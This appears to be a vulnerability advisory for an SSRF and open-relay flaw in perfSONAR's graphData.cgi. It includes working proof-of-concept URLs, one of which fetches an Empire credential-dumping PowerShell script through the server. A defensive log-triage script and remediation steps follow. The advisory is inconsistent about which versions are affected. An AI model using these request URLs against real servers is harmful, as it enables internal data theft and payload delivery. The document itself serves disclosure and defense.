CVE-2022-41412: GitHub - renmizo/CVE-2022-41412

An issue in the graphData.cgi component of perfSONAR v4.4.5 and prior allows attackers to access sensitive data and execute Server-Side Request Forgery (SSRF) attacks.


Vendor: perfSONAR
Link: https://github.com/perfsonar/
Affected Versions: v4.x <= v4.4.4
Vulnerability Type: Open Proxy Relay
Vulnerability Family: CGI Abuses
Discovered by: Ryan Moore
CVE: CVE-2022-41412

Summary

perfSONAR bundles a graphData.cgi script, used to graph and visualize data. A flaw in graphData.cgi allows unauthenticated users to proxy and relay HTTP/HTTPS traffic through the perfSONAR server. The vulnerability can potentially be leveraged to exfiltrate or enumerate data from internal web servers.

This vulnerability was patched in perfSONAR v4.4.5.

There is a whitelisting function that mitigates the issue, but it is disabled by default.

Proof of Concept Examples

Here are three examples of this vulnerability in use. To pass the regex match, the URL must include /esmond/perfsonar/archive/…/…/…/.

Example 1:

In this example, www.google.com is proxied through the perfSONAR server.
https://192.168.68.145/perfsonar-graphs/cgi-bin/graphData.cgi?action=ma_data&url=https://www.google.com/esmond/perfsonar/archive/…/…/…/&src=8.8.8.8&dest=8.8.4.4

Example 2:

In this example, sample data is exfiltrated from an adjacent internal web host listening on an arbitrary port (4444).
https://192.168.68.145/perfsonar-graphs/cgi-bin/graphData.cgi?action=ma_data&url=http://192.168.68.113:4444/esmond/perfsonar/archive/…/…/…/&src=8.8.8.8&dest=8.8.4.4

Example 3:

In this example, a malicious PowerShell script is downloaded through the perfSONAR server.
https://192.168.68.145/perfsonar-graphs/cgi-bin/graphData.cgi?action=ma_data&url=https://raw.githubusercontent.com/esmond/perfsonar/archive/…/…/…/EmpireProject/Empire/master/data/module_source/credentials/Invoke-PowerDump.ps1&src=8.8.8.8&dest=8.8.4.4

Remediation

Enable whitelisting in perfSONAR.
Update perfSONAR to 4.4.5 or newer.
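As an added illustration for the proof-of-concept URLs above and for the whitelisting remediation (this is not perfSONAR's own code), the Python below models the weak path-only check that lets any host through next to a host-allowlist check, and runs both over constructed access-log lines so an operator can pick out relay attempts. The allowlist hosts, the three-segment path pattern and the log lines are assumptions.

```python
import re
from urllib.parse import parse_qs, urlparse

# Assumed allowlist of measurement-archive hosts this node may query; it models
# the whitelisting feature the advisory says is disabled by default.
ALLOWED_MA_HOSTS = {"ma.example.net", "192.168.68.145"}
# Simplified model of the pre-4.4.5 check: only a three-segment archive path is required.
ARCHIVE_PATH = re.compile(r"/esmond/perfsonar/archive/[^/]+/[^/]+/[^/]+/")
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def weak_check(target):
    """Path-pattern-only check: passes for any host, hence the open relay."""
    return ARCHIVE_PATH.search(target) is not None


def hardened_check(target):
    """Scheme, exact host allowlist and path pattern must all hold."""
    p = urlparse(target)
    return (p.scheme in ("http", "https") and p.hostname in ALLOWED_MA_HOSTS
            and ARCHIVE_PATH.search(p.path) is not None)


def ma_target(log_line):
    """url= value of a graphData.cgi?action=ma_data request in a log line, else None."""
    m = REQUEST.search(log_line)
    req = urlparse(m.group(1) if m else "")
    if not req.path.endswith("/graphData.cgi"):
        return None
    qs = parse_qs(req.query)
    if qs.get("action") != ["ma_data"]:
        return None
    return qs.get("url", [None])[0]


def triage(log_lines):
    """(target, passes_weak_check, passes_hardened_check) for each ma_data request."""
    targets = (ma_target(line) for line in log_lines)
    return [(t, weak_check(t), hardened_check(t)) for t in targets if t is not None]


def access_log(path):  # constructed combined-format access-log line
    return f'10.0.0.7 - - [01/Oct/2022:10:00:01 +0000] "GET {path} HTTP/1.1" 200 512'


CGI = "/perfsonar-graphs/cgi-bin/graphData.cgi?action=ma_data&src=8.8.8.8&dest=8.8.4.4&url="
SAMPLE_LOG = [  # constructed: one legitimate MA query, two relay attempts, one unrelated
    access_log(CGI + "https://ma.example.net/esmond/perfsonar/archive/a/b/c/"),
    access_log(CGI + "http://192.168.68.113:4444/esmond/perfsonar/archive/a/b/c/"),
    access_log(CGI + "https://www.google.com/esmond/perfsonar/archive/a/b/c/"),
    access_log("/perfsonar-graphs/cgi-bin/graphData.cgi?action=other&x=1"),
]
```

Every request in `SAMPLE_LOG` that targets a foreign host passes `weak_check` and fails `hardened_check`, which is the distinction an allowlist-enabled deployment enforces.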

References

  • https://lists.internet2.edu/sympa/arc/perfsonar-user/2022-09/msg00030.html
  • https://github.com/perfsonar/graphs/commit/463e1d9dc30782d9b1c002143551ec78b74e03bb
  • https://www.perfsonar.net/releasenotes-2022-09-20-4-4-5.html
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41412
